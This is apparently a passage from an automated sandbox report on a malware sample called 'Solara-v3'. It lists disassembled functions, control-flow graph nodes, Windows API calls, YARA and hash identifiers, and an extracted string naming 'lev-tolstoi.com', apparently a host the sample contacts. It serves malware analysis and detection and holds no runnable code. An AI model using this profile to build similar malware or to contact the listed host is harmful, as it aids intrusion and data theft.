                                                                                                                                                                                                                                              control_flow_graph 1182 40a8b0-40a8e5 1183 40a8f0-40a920 1182->1183 1183->1183 1184 40a922-40aa1f 1183->1184 1185 40aa20-40aa59 1184->1185 1185->1185 1186 40aa5b-40aa74 1185->1186 1187 40aa80-40aa9a 1186->1187 1187->1187 1188 40aa9c-40aab1 call 40b640 1187->1188 1190 40aab6-40aabd 1188->1190 1191 40acd0-40acdc 1190->1191 1192 40aac3-40aacf 1190->1192 1193 40aad0-40aadb 1192->1193 1194 40aae2-40aaf6 1193->1194 1195 40aadd-40aae0 1193->1195 1196 40acc4 1194->1196 1197 40aafc-40ab11 1194->1197 1195->1193 1195->1194 1199 40acc7-40accd call 43b1a0 1196->1199 1198 40ab20-40ab3a 1197->1198 1198->1198 1200 40ab3c-40ab43 1198->1200 1199->1191 1202 40ab75-40ab79 1200->1202 1203 40ab45-40ab4c 1200->1203 1206 40acc2 1202->1206 1207 40ab7f-40aba7 1202->1207 1205 40ab57-40ab5c 1203->1205 1205->1206 1208 40ab62-40ab69 1205->1208 1206->1196 1209 40abb0-40abe6 1207->1209 1210 40ab6b-40ab6d 1208->1210 1211 40ab6f 1208->1211 1209->1209 1212 40abe8-40abf2 1209->1212 1210->1211 1213 40ab50-40ab55 1211->1213 1214 40ab71-40ab73 1211->1214 1215 40ac34-40ac38 1212->1215 1216 40abf4-40abff 1212->1216 1213->1202 1213->1205 1214->1213 1215->1206 1217 40ac3e-40ac46 1215->1217 1218 40ac17-40ac1b 1216->1218 1220 40ac50-40ac7d 1217->1220 1218->1206 1219 40ac21-40ac28 1218->1219 1221 40ac2a-40ac2c 1219->1221 1222 40ac2e 1219->1222 1220->1220 1223 40ac7f-40ac89 1220->1223 1221->1222 1224 40ac10-40ac15 1222->1224 1225 40ac30-40ac32 1222->1225 1226 40ac8b-40ac93 1223->1226 1227 40acdd-40acdf 1223->1227 1224->1215 1224->1218 1225->1224 1229 40aca7-40acab 1226->1229 1228 40ace8-40ad07 call 40a640 1227->1228 1228->1199 1229->1206 1231 40acad-40acb4 1229->1231 1233 40acb6-40acb8 1231->1233 1234 40acba 1231->1234 1233->1234 1235 40aca0-40aca5 1234->1235 1236 40acbc-40acc0 1234->1236 1235->1229 1237 40ace1-40ace6 1235->1237 1236->1235 1237->1228 1238 40ad09-40ad0b 1237->1238 1238->1199
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: F>]>$j>a>$ok
                                                                                                                                                                                                                                              • API String ID: 0-2883800044
                                                                                                                                                                                                                                              • Opcode ID: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
                                                                                                                                                                                                                                              • Instruction ID: dd8b5e7c3122165f2fea48d4b4d2b9f00cb897ce1b6d78e13b6b522b53c881e4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76B1F17261C3118BD328DF14845156FBBF2EFD1304F16482DEAD5AB380D239A91ACB9B
                                                                                                                                                                                                                                              Function 0042CE60 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID: 8a
                                                                                                                                                                                                                                              • API String ID: 3960555810-1827930058
                                                                                                                                                                                                                                              • Opcode ID: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
                                                                                                                                                                                                                                              • Instruction ID: fc3ee4ebcf7795b95269f936594514899a52a37c83a41ea56dd400e4873d1426
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14B1F37160C3918BD729CF2AD85136BFBE1AFD6304F58886EE0D6873A1D7398405CB56
                                                                                                                                                                                                                                              Function 0043D0D9 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: 9.$9.
                                                                                                                                                                                                                                              • API String ID: 2994545307-2940951921
                                                                                                                                                                                                                                              • Opcode ID: 208d8e1e8e407b3aab538934c649c1b580c7efd0bc8ea0d94b0776a936eb48b6
                                                                                                                                                                                                                                              • Instruction ID: f93bdb9af1b3060ada3c74757461e6e726e21cc43fcc8ee35440b0537a72968c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 208d8e1e8e407b3aab538934c649c1b580c7efd0bc8ea0d94b0776a936eb48b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7414575E041206FE7049F28DD5072BB293ABDA315F14E63AD984E73D9DA789C2087C8
                                                                                                                                                                                                                                              Function 0042C8D0 Relevance: 1.9, APIs: 1, Instructions: 364COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3960555810-0
                                                                                                                                                                                                                                              • Opcode ID: 0461e324be3076e302c2b43e19ad019a5e4dd1efb388be3de8ee3e0016c2b1d6
                                                                                                                                                                                                                                              • Instruction ID: 0389c4d48cda137bc469657c8f973424e39e61ed96ceabf3f35c8008a6260973
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0461e324be3076e302c2b43e19ad019a5e4dd1efb388be3de8ee3e0016c2b1d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADA10571A0C3918BE729CF2AD85136BFBE1AFD6304F58886EE0D587391D7398405CB56
                                                                                                                                                                                                                                              Function 00414E25 Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c3c72d93ae102fda253e9b18f9f4e759999c11c12cd159e5bbea8afbf54f8cb9
                                                                                                                                                                                                                                              • Instruction ID: ddd59b32adecc82288acb2027229a5aeb8c46ffcdc49d2923191268a2ca1eca9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3c72d93ae102fda253e9b18f9f4e759999c11c12cd159e5bbea8afbf54f8cb9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54A119B59083819FD724CB29C4507AFBBE1BFD9304F18492EE0DA87382D639D985CB56
                                                                                                                                                                                                                                              Function 0043FB10 Relevance: 1.6, Strings: 1, Instructions: 360COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: mLjL
                                                                                                                                                                                                                                              • API String ID: 2994545307-1911556848
                                                                                                                                                                                                                                              • Opcode ID: 0d0a37e59aa2415a73e4c1409be01007e9c7a6054839f71ec17ff75bb0ca7d0b
                                                                                                                                                                                                                                              • Instruction ID: 8475cca9f7a5a570b914ab5b93dd941b56f2e4823fdd83e04adae2a5f603aedc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d0a37e59aa2415a73e4c1409be01007e9c7a6054839f71ec17ff75bb0ca7d0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4B12772E083118BD728CF14D89156FB7A2FFC8314F15953DE98A573A1DA39AC05C786
                                                                                                                                                                                                                                              Function 0043CD20 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                              Function 004400C0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              • Opcode ID: cc1def0ecf068c9e964342eea13a098f01eda3a67e33911835bef30bc145f795
                                                                                                                                                                                                                                              • Instruction ID: d1964a0b6ec20b0ae5f3d5701f2f9b0f514b95607fc0800dfcb7b8fb3ca6f9ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc1def0ecf068c9e964342eea13a098f01eda3a67e33911835bef30bc145f795
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 644155B59083108BE714CF24DC84A6BB7F1FFD5318F14852DEA895B3A0EB7A9815C786
                                                                                                                                                                                                                                              Function 0043D9C1 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 3511ef42c4b007baf1fec548fa9812ccd487ed6d294edc1ac7bf06dcc82e3f6b
                                                                                                                                                                                                                                              • Instruction ID: 96e49273ea620ae155524270832f03a61cff14ce2c4030ad9a9b34360ce12f08
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3511ef42c4b007baf1fec548fa9812ccd487ed6d294edc1ac7bf06dcc82e3f6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA4123B0A083109FD718CF24D95073BB6E2EFC9705F14A52EE481A7394E7399C05C79A
                                                                                                                                                                                                                                              Function 0043F040 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 9191ed74d0d8586d4a373cf941998efa4049e7a180d54467ad32adb286ee0df7
                                                                                                                                                                                                                                              • Instruction ID: 2a5c568ff03cc436ede057be6d62a120ad0484157719e54bd9382df1f9979818
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9191ed74d0d8586d4a373cf941998efa4049e7a180d54467ad32adb286ee0df7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4021EEB94093049BC710CF18E88066BB7F5FFC9320F15693DE58897360E376A848C75A
                                                                                                                                                                                                                                              Function 0040C08B Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: |X|X
                                                                                                                                                                                                                                              • API String ID: 0-2218283020
                                                                                                                                                                                                                                              • Opcode ID: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                              • Instruction ID: 13b12417835161548989760e477e4b9bf18457aaa1a030ea2397493de378e4bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D21A2BAE406228BC725CF58CC95BAAF7B0FF49700F024228ED49BB750D635AC4287D4
                                                                                                                                                                                                                                              Function 0043F150 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                              • Instruction ID: bda42ee7fe58aa78db34f1b728a56894abae76de33374c7402216ab42dc0119f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29812636A042119BCB249F18CC40AAFB3A2FFD8710F15A53DED859B364EB34AC158385
                                                                                                                                                                                                                                              Function 0043B1D0 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                              • Instruction ID: e6a55991c61f36b3aa79f998637d078abe9e386279f295a7a094abe81f2018d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97513735A083149BE720EF25C84476BB3A2FFD9700F15953EDA849B361E7756C1187C9
                                                                                                                                                                                                                                              Function 0042B00F Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                              • Instruction ID: f6c1554600131ee17df06160cbc0b7981c093ccfdab986da07a7a73cd69f7880
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81415121B542778BEB148A249C623B7F791EB66380F9C827BD85587381E31CDC16E3D6
                                                                                                                                                                                                                                              Function 004404D0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                              • Instruction ID: de807461c8146aa5c2ca4a7867b47f0d9f0c6b40113fcb14a59165e0f2bfc41e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED412638258300ABE714DF54DC81BBBB3A6EBC5314F19542EE2859B3A0D679AC319B09
                                                                                                                                                                                                                                              Function 004086C0 Relevance: 7.6, APIs: 5, Instructions: 92threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004086E2
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004086E8
                                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004086F9
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004087BA
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004087F9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4063528623-0
                                                                                                                                                                                                                                              • Opcode ID: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
                                                                                                                                                                                                                                              • Instruction ID: 2ce280b1cfb3896d9c47e6bfffc2885025d21bcec38fee026491e5ccd9a28d87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA2157B5E002005BD714BB25DE0B7AA36929FC6715F19853EF481FB3EADE7D4801829E
                                                                                                                                                                                                                                              Function 0040E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 928 40e042-40e066 call 409570 CoUninitialize 931 40e070-40e0e2 928->931 931->931 932 40e0e4-40e156 931->932 933 40e160-40e187 932->933 933->933 934 40e189-40e19a 933->934 935 40e1bb-40e1c3 934->935 936 40e19c-40e1aa 934->936 938 40e1c5-40e1c6 935->938 939 40e1db-40e1e8 935->939 937 40e1b0-40e1b9 936->937 937->935 937->937 940 40e1d0-40e1d9 938->940 941 40e1ea-40e1f1 939->941 942 40e20b-40e213 939->942 940->939 940->940 943 40e200-40e209 941->943 944 40e215-40e216 942->944 945 40e22b-40e235 942->945 943->942 943->943 946 40e220-40e229 944->946 947 40e237-40e23b 945->947 948 40e24b-40e257 945->948 946->945 946->946 949 40e240-40e249 947->949 950 40e271-40e3a4 948->950 951 40e259-40e25b 948->951 949->948 949->949 952 40e3b0-40e3db 950->952 953 40e260-40e26d 951->953 952->952 955 40e3dd-40e402 952->955 953->953 954 40e26f 953->954 954->950 956 40e410-40e44f 955->956 956->956 957 40e451-40e480 call 40b640 956->957 959 40e485-40e4b1 957->959
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                                              • String ID: >$&j=$lev-tolstoi.com
                                                                                                                                                                                                                                              • API String ID: 3861434553-369662323
                                                                                                                                                                                                                                              • Opcode ID: 3d28a1f1a15885d9d52034b46abf3598a3a277188b4e8ec1b803c36980448f93
                                                                                                                                                                                                                                              • Instruction ID: 1fb7841e1e2579a847afcb15edb254a2e2fdfe5f13ac9abd7e0cca66af938fd0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d28a1f1a15885d9d52034b46abf3598a3a277188b4e8ec1b803c36980448f93
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6A1EE7150D3928BD3348F2AD4947ABBBE1AFD2300F28996DC4D96B3A1D7390419CB96
                                                                                                                                                                                                                                              Function 0042BAB3 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
